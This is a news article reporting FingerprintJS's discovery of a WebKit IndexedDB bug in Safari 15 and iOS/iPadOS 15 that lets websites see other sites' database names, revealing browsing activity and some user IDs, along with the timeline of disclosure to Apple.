Safari bug lets websites track browsing activity and unique identifiers
The flaw, found in Apple's WebKit browser engine, affects Safari 15 on macOS and all browsers on iOS and iPadOS 15
Researchers have found a bug in Apple's Safari browser that allows websites to track a user's browsing activities across other sites.
The bug, discovered by browser fingerprinting service FingerprintJS, also exposes a user's unique ID for some websites to other sites that they visit.
When properly implemented, IndexedDB follows the same-origin principle. This ensures that information stored from a web page is only available to web pages from the same domain. It stops over-inquisitive web pages from accessing other domain's stored information, which could include sensitive user or session data.
Bridging the DevSecOps divide: Spotlight on key relationships
The importance of relationships between security and developmentFree download
FingerprintJS found that WebKit's IndexedDB implementation fails to observe the same-origin principle, instead making stored information available to web sites from other domains.
FingerprintJS called the bug a privacy violation. "It lets arbitrary websites learn what websites the user visits in different tabs or windows," the company said in its analysis of the bug. "This is possible because database names are typically unique and website-specific."
The company found some websites using user-specific IndexedDB data such as ID numbers in their IndexedDB database names, making it easy for any other website to find out a user's ID on other sites. Using this ID to look up the user's assets (such as profile pictures) could allow identification of the user, the company warned. Google websites store ID numbers in this way, making it possible for other sites to harvest Google IDs using the bug.
FingerprintJS said that it had notified Apple of this bug on November 28 but Apple had not not patched it. Apple's engineers began creating a patch on Sunday February 17, the day that FingerprintJS published details of the bug.
What 2023 will mean for the industry
What do most IT decision makers really think will be the important trends and challenges in the coming year?Free Download
2022 Magic quadrant for Security Information and Event Management (SIEM)
SIEM is evolving into a security platform with multiple features and deployment modelsFree Download
IDC MarketScape: Worldwide unified endpoint management services
2022 vendor assessmentFree Download
Magic quadrant for application performance monitoring and observability
Enabling continuous updating of diverse & dynamic application environmentsView Now